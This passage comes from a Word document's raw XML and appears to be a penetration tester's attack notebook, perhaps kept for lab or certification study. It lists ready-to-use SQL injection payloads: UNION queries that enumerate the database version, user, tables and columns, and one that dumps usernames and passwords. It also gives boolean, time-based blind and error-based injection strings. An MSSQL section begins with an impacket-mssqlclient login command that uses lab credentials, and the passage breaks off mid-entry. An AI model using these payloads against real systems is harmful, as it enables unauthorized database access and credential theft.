          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT @@version, NULL-- </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018BC">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Identifying Current Database</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018BD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT database(), NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018BE">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finding Current User</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018BF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT user(), NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018C0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018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C2">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extracting Table and Column Names</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018C3">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="779"/>
        </w:numPr>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Customization needed: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Replace 'users', 'table_name', 'column_name' with the actual table name (which you may discover through earlier queries like extracting table names).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018C4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If database schema information is accessible, use these commands:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018C5">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extract All Table Names (MySQL Example)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018C6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT table_name, NULL FROM information_schema.tables WHERE table_schema=database()--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018C8">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extract All Column Names for a Specific Table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018C9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT column_name, NULL FROM information_schema.columns WHERE table_name='users'--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018C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CC">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Retrieving Data from Tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018CD">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="195"/>
        </w:numPr>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Customization needed:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Replace username, password, and users with the actual column and table names from the target database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018CE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once you have table and column names, you can extract data:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018CF">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="40" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extract Usernames and Passwords</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018D0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT username, password FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018D1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018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D3">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Blind SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018D4">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If the database doesn't return output directly, use blind techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1337"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean-based Blind SQL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1337"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=1--</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Returns normal page)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018D7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1337"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' AND 1=2--</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Returns error page)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018D8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time-based Blind SQL</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> ' AND IF(1=1, SLEEP(5), NULL)-- </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018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DA">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Error-based SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018DB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Force the database to throw errors containing valuable information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018DC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">' UNION SELECT 1, extractvalue(1,concat(0x7e,(SELECT database()),0x7e)), NULL--</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018DD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018DE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018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8E0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1s1a6fa3ylf8" w:id="200"/>
      <w:bookmarkEnd w:id="200"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft SQL Server (mssql) (ms-sql-s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Found on port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1433</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId509">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Cheatsheet</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId510">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:b w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Guide</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018E9">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default Databases in MSSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1345"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">master, tempdb, model, and msdb</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> are default databases, so they often don't have important stuff, but feel free to check anyway</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018EB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018EC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018ED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use Impacket tools, specifically mssqlclient.py. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018EE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018EF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connect using impacket-mssqlclient</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000018F2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Administrator </w:t>
      </w:r>
